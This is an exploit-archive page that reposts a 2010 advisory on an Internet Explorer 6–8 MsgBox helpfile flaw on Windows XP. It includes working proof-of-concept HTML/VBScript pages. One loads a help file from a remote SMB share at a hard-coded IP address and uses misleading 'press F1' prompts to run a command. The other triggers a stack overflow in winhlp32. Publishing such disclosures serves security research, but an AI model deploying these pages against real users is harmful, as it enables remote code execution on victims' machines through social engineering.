首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Internet Explorer versions 6, 7, 8 command execution vulnerability
来源:twitter.com/mprodeus 作者:Prodeus 发布时间:2010-03-01  

------------------isec-0027-msgbox-helpfile-ie.txt------------

===[ ABSTRACT ]=========================================================

It is possible to invoke winhlp32.exe from Internet Explorer 8,7,6
using VBScript. Passing malicious .HLP file to winhlp32 could allow
remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe.


===[ AFFECTED SOFTWARE ]================================================

Windows XP SP3

NOT AFFECTED: Vista, Windows 7

===[ DESCRIPTION ]======================================================

To trigger vulnerability some user interaction is needed. Victim has to
press F1 when MsgBox popup is displayed.

Syntax of MsgBox function:

MsgBox(prompt[,buttons][,title][,helpfile,context])


It is possible to pass remote samba share as helpfile parameter.
In addition there is a stack based buffer overflow when helpfile
parameter is too long. However, on XP winhlp32.exe is compiled with
/GS flag, which in this case effectively guard the stack.

Proof-of-Concept is available here:
http://isec.pl/poc-isec27/

===[ IMPACT ]===========================================================

Score: MEDIUM

The vulnerability allows remote attacker to run arbitrary code on
victim machine.
 

===[ DISCLOSURE TIMELINE ]==============================================

01 Feb 2007 The vulnerability was discovered.
26 Feb 2010 Public disclosure


===[ AUTHOR ]===========================================================

Maurycy Prodeus | twitter.com/mprodeus

-------------------------------------------poc-isec27.html-----------------------------------

<html>
<title>IE8, IE7 XP MsgBox PoC</title>
<body>
<script>
if(navigator.userAgent.indexOf('MSIE') < 0)
document.write('<b>Warn: Your browser isn\'t IE ? It won\'t work.</b>');
</script>
<br><br>

This is simple demo for IE8/IE7 (only WinXP) vulnerability described here:<br>
<a href="http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt">http://isec.pl/vulnerabilities/isec-0027-msgbox-helpfile-ie.txt</a>
<br><br><br> 
[+] The first one should spawn calc.exe after pressing F1.
<br>
<FORM>
<INPUT TYPE="BUTTON" VALUE="Calc.exe" ONCLICK="window.location.href='box.html'">
</FORM>
<br><br>
[+] The second one triggers stack overflow in winhlp32 process.
<br>
<FORM>
<INPUT TYPE="BUTTON" VALUE="Stack Overflow" ONCLICK="window.location.href='box2.html'">
</FORM>

<br><br>
iSEC 2010 (C) <a href="http://twitter.com/mprodeus">maurycy prodeus</a>
</body>
</html>

-----------------------------------box2.html----------------------------

<html>
<script type="text/vbscript">
big = "aaaa"

For i=1 to 4500
  big = big & "\..\"
Next


MsgBox "please press F1 to save the world", ,"please save the world", big, 1
</script>
</html>

------------------------box.html-----------------------------------

<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"

//For i=1 to 2500
//  big = big & "\..\"
//Next


MsgBox "please press F1 to save the world", ,"please save the world", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Joomla Component com_joomlacon
·Orbital Viewer v1.04 (.orb) 0d
·Gravity Board X v2.0 BETA (Pub
·Mozilla Firefox <= 3.6 Denial
·iPhone WebCore::CSSSelector()
·Linux x86 - execve /bin/sh - 2
·MediaCoder v0.7.3.4605 Local B
·Joomla Component com_paxgaller
·Joomla Component com_hdflvplay
·RCA DCM425 Cable Modem micro_h
·Safari 4 Remote Crash Vulnerab
·Windows Xp Home Edition SP2 En
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved